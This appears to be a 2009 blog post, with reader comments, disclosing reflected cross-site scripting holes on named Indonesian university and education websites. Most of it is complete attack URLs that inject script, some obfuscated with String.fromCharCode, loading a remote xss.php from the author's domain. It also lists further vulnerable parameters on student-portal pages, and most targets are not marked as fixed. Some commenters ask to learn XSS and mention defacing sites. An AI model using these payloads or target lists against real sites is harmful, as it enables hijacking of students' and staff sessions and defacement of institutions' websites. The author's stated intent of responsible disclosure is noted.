Loading ...
XSS On Indo Education Institutions
In my country, we can easily find lots of bugs on some big education institution websites, lets just say ITB (Institut Teknologi Bandung), UGM (Universitas Gadjah Mada), UI (Universitas Indonesia) or maybe like IPB (Institut Pertanian Bogor/Bogor Agricultural University). How could they miss it while in case they have quite good standard in computer and information technology, they have Computer Science Faculty, havent they? I can even still remember about the sql injection thingy on IPB site last two months a go. It’s a good thing they have fixed the bug, but if i’m not mistaken, it took them around one or two week to fixed it since we informed them about it, lolz.. Where’s the admin anyway?
OK, let’s just go straight to the topic, XSS. Here are some examples of their XSS thingy :
http://www.itb.ac.id/search/?q=Crazy-da-Vinci&start=%3Cscript%3E document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99, 61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46, 110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116, 62))%3C/script%3E
Note : bug fixed on Monday, April 13, 2009
http://www.ugm.ac.id/index.php?page=headline&artikel=%3Cscript%20src= %22http://crazydavinci.net/xss.php%22%3E%3C/script%3E%27
http://www.digilib.ui.ac.id/opac/themes/libri2/hasilcari.jsp?query=%3Cscript %20src=%22http://crazydavinci.net/xss.php%22%3E%3C/script%3E&Submit=Cari
http://web.ipb.ac.id/~lppm/ID/index.php?view=%3Cscript%3Edocument.write (String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116, 116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116, 47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62)) %3C/script%3E
http://bsi.ac.id/kalender/?start=%3Cscript%3Edocument.write (String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116, 116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99,105,46,110,101,116, 47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62)) %3C/script%3E
Note : bug fixed around first of June, 2009
Another pages vulnerable to XSS :
- http://bsi.ac.id/?lang=in&page=event&next=1<XSS Here>
- http://bsi.ac.id/ubsi/?cari=<XSS Here>
- http://bsi.ac.id/hadiah/?start=<XSS Here>
- http://bsi.ac.id/hadiahd1/?start=<XSS Here>
- http://jobs.bsi.ac.id/?start=<XSS Here>
For logged in students
- http://students.bsi.ac.id/d3/jadwaldosen.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/kalender.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/maildosen.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/suratriset.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/nilaimurni.php?start=<XSS Here>
- http://students.bsi.ac.id/d3/archives.php?start=<XSS Here>
http://pmb.unikom.ac.id/spmb/?go=hasiltest1&page= %3Cbody%20onload=%22funtion%20MM_preloadImages(){null} %22%3E%3Cscript%20src=%22http://crazydavinci.net/xss.php%22%3E%3C/script%3E
http://www.unpak.ac.id/kegiatan?filter=%22onmouseover=%22x=document; a=x.createElement(%27script%27);a.src=%27http://crazydavinci.net/xss.php%27 ;x.getElementsByTagName(%27head%27)[0].appendChild(a)%22%20style= %22z-index:99;position:absolute;top:0;left:0;height:2000px;width:2000px%22
http://www.evaluasi.or.id/profile-graph.php?schoolID=044163&schoolName= %3Cscript%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116, 32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118, 105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E
ps:
I have already informed them about this thing, lets just wait for them to fix it 
Lets make indonesian sites better, dont screw them when you find any bugs. 
Media-Box
![[+]](http://crazydavinci.info/images/clock_icon.gif){kind=icon}
April 23rd, 2009 at 11:15 AM
ajarin dnk om bikin xss mau bisa nii
April 23rd, 2009 at 3:32 PM
XSS cuma buat newbie bob,
xixixi boby kan dah sering ulik2 methode wat deface n get admin rights
pasti klo cuma tuk xss ga sulit..
coba2 aja kaya sql injection :D, suka pura2 ih :p
April 28th, 2009 at 10:16 AM
You’re
Clever….
PeoPle
May 28th, 2009 at 10:29 PM
nice post, thx for sharing it
December 13th, 2009 at 3:29 PM
Ga mudhenk bos, gw taunya WS, LOTUS, DBASE duank